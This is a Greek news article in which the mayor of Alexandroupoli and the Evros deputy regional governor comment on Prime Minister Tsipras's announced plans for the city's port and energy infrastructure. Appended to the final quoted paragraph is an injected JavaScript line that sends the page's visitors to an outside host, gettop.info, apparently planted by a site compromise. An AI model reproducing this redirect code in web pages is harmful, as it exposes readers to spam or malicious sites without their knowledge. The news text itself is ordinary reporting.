Δήμαρχος Αλεξανδρούπολης: Έχουμε πρωθυπουργό που έρχεται να θωρακίσει την περιοχή

0
2

 

Με καλή προαίρεση δήλωσε πως δέχεται τις σημερινές εξαγγελίες του πρωθυπουργού Αλέξη Τσίπρα, για την ανάπτυξη του λιμένα της Αλεξανδρούπολης και την ανάδειξη της πρωτεύουσας του Έβρου σε διαμετακομιστικό και ενεργειακό κόμβο για την ευρύτερη περιοχή, ο δήμαρχος της πόλης, Βαγγέλης Λαμπάκης.

Μιλώντας στο Αθηναϊκό Πρακτορείο Ειδήσεων, ο κ. Λαμπάκης, μετά το πέρας της ομιλίας του κ. Τσίπρα στον Οργανισμό Λιμένα Αλεξανδρούπολης, πρώτο σταθμό της περιοδείας του στη Θράκη, χαρακτήρισε μία ωραία ημέρα για την πόλη τη σημερινή, καθώς «επί έξι χρόνια ονειρεύομαι ως δήμαρχος ακριβώς την πορεία του λιμένα, όπως την «άπλωσε» σήμερα ο πρωθυπουργός της χώρας».

Ο κ. Λαμπάκης διευκρίνισε πως δέχεται καλοπροαίρετα τις εξαγγελίες του κ. Τσίπρα, γιατί ο εξαγγελθείς σχεδιασμός είναι δυνατόν να συμβεί, δεδομένου ότι «πατάει σε σταθερά σανίδια και είναι μονόδρομος».

«Τον πιστεύω καλοπροαίρετα, επειδή τα όσα εξήγγειλε κατευθύνονται πρώτα- πρώτα στο εθνικό συμφέρον, είναι εθνικός στόχος, εθνική επένδυση και πόρος πλουτοπαραγωγικός που αφορά τη γενικότερη οικονομία της Ελλάδας».

Από την πλευρά του ο αντιπεριφερειάρχης Περιφερειακής Ενότητας Έβρου, Δημήτρης Πέτροβιτς δηλώνει στο Αθηναϊκό Πρακτορείο πως «είναι θετικό το ότι επισκέφθηκε ο πρωθυπουργός της χώρας τον Έβρο και την Αλεξανδρούπολη. Η αναφορά του κ. Τσίπρα σε νέες επενδύσεις και υποδομές στο λιμάνι της Αλεξανδρούπολης και στα ενεργειακά δίκτυα της περιοχής, καταδεικνύουν ότι η κυβέρνηση αντιλαμβάνεται το σημαντικό ρόλο που μπορεί να διαδραματίσει η Αλεξανδρούπολη, ο Έβρος και η Θράκη, σε εθνικό και διεθνές επίπεδο. Όλα όμως κρίνονται εκ του αποτελέσματος και ως εκ τούτου αναμένουμε να δούμε άμεσα και στην πράξη την υλοποίηση των λεγομένων του». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here